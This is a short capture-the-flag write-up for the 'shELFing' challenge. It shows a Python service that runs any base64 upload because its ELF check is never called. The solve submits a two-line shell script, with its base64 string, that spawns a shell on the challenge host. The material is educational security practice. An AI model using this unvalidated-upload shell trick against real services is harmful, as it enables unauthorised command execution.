shELFing
data:image/s3,"s3://crabby-images/601ed/601ed98fded044c0ffd099161cab6dde020baa33" alt="shELFing"
This is the first, and easiest challenge in the brics+ CTF, hosted by ITMO in Russia with the support of several (as of the time of writing) US sanctioned Russian companies.
This challenge suggests that you have to send a tiny ELF x64 executable which calls /bin/sh
or equivalent.
We are provided with source code, which I shall provide below:
#!/usr/bin/env python3
import sys
import os
import base64
MAX_USER_INPUT = 76
def checkElf(data: bytes) -> bool:
if data[0:4] != b'\x7fELF':
return False
if data[0x12] != 0x3e:
return False
if data[0x10] != 0x2:
return False
return True
def main():
elf_data = input("[?] Enter base64 encoded ELF x64 executable: ")
try:
elf_data = base64.b64decode(elf_data)
except:
print("[-] Can't decode base64!")
sys.exit(0)
if len(elf_data) > MAX_USER_INPUT:
print("[-] Error ELF size!")
sys.exit(0)
elf_data += b'\x00' * 4
filename = "/tmp/{}".format(os.urandom(16).hex())
fd = open(filename, 'wb')
fd.write(elf_data)
fd.close()
os.chmod(filename, 0o755)
os.execve(filename, [filename], {})
if __name__ == "__main__":
If you look closely at the main function, you will see that checkELF is never actually called. This means that you can submit whatever base64 encoded string and the program will decode it, write it to a file, and execute it.
Knowing this, I came up with this beautiful ELF file:
#!/bin/sh
/bin/sh
or
IyEvYmluL3NoCi9iaW4vc2gK
When submitted, this pops us into a shell!
data:image/s3,"s3://crabby-images/30839/308391dd2c5186410bc50713a5015a8cbe5fa874" alt=""